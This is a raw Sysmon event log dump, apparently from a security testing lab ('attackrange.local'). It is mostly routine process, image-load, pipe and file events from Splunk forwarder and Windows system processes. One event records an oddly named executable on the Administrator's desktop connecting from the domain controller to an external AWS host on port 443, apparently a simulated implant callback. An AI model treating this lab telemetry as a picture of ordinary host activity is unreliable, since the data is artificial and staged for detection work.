19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001606510Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001606509Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001606508Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001606507Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001606506Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001606505Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001606504Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001606503Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 
19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001606502Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001606501Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001606500Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
734700x80000000000000001606499Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001606498Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001606497Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001606496Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, 
Inc.Valid 10341000x80000000000000001606495Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.651{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001606494Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A89-6080-C860-00000000BB01}5152C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001606493Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.636{21761711-7A89-6080-C860-00000000BB01}5152C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001606492Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606491Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606490Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606489Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001606488Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001606487Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:18:33.635{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 
534500x80000000000000001606486Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.081{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 10341000x80000000000000001606485Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.081{21761711-7A88-6080-C760-00000000BB01}5668400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001606484Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.081{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001606483Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:33.081{21761711-7A88-6080-C760-00000000BB01}5668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating 
SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 10341000x80000000000000001095251Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:33.513{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095250Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:33.513{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606552Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:34.805{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 
23542300x80000000000000001606551Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:34.805{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=715A81FD95A6494DB51716707323D4FA,SHA256=B1E377EC3846F24E37E5A389BCE788116A8EEF936F16D99BCB67F4F9DA530F2Afalsefalse - insufficient disk space 354300x80000000000000001095257Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:30.159{761B69BB-65B6-6080-265D-00000000BA01}2304C:\Users\Administrator\Desktop\64_dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1158-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 23542300x80000000000000001095256Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:34.622{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C815CBB38D403004193D1AA3735F75FA,SHA256=954D04799F0F856B1A1E9800E6796CA4820B408338A40056BF72271520566FAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095255Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:34.606{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C939C2D3B4EF7E0FF490DBE7275C55CC,SHA256=F3E0C23A79E45850F8AD844D15F80DD2734961AA0D543390C910868E917ABC9B,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001606550Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-SetValue2021-04-21 
19:18:34.067{21761711-83AE-607D-1000-00000000BB01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d736e3-0x1f42fe40) 10341000x80000000000000001095254Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:34.514{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095253Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:34.514{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606554Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:35.872{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 
23542300x80000000000000001606553Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:35.872{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=770F6D57539AA56C3435F129D5BAD087,SHA256=E2AB47A476E3E42BD43CCDB8C53AF06A73DBE8C427AA5A5AC3A354DA8D32F6A5falsefalse - insufficient disk space 23542300x80000000000000001095260Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:35.621{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21FEFAD7919871700D9A06471C569FC7,SHA256=7D29E711F4E580DFD2A20D0639D94FE05E8D8D7F0852384E86585FE7C4F759C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095259Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:35.515{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095258Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 
19:18:35.515{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606556Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:36.928{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606555Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:36.928{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89A93237340857B05F1B99E6662E99EB,SHA256=F016A5815ECA0C7BB6F592923C48A9DA3FD1A59F288CB7FC533AECE6C9D20893falsefalse - insufficient disk space 354300x80000000000000001095265Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:31.686{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1159-false10.0.1.12-8000- 23542300x80000000000000001095264Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:36.633{761B69BB-820D-607D-D800-00000000BA01}1064NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CD05D0501426DD2028FB02418E8F7A5,SHA256=ECAD671041FAB774632F3ECEAEE0E7DFD5A5F0FC79716A703B04029C25F55006,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095263Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:36.515{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095262Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:36.515{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095261Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:36.093{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program 
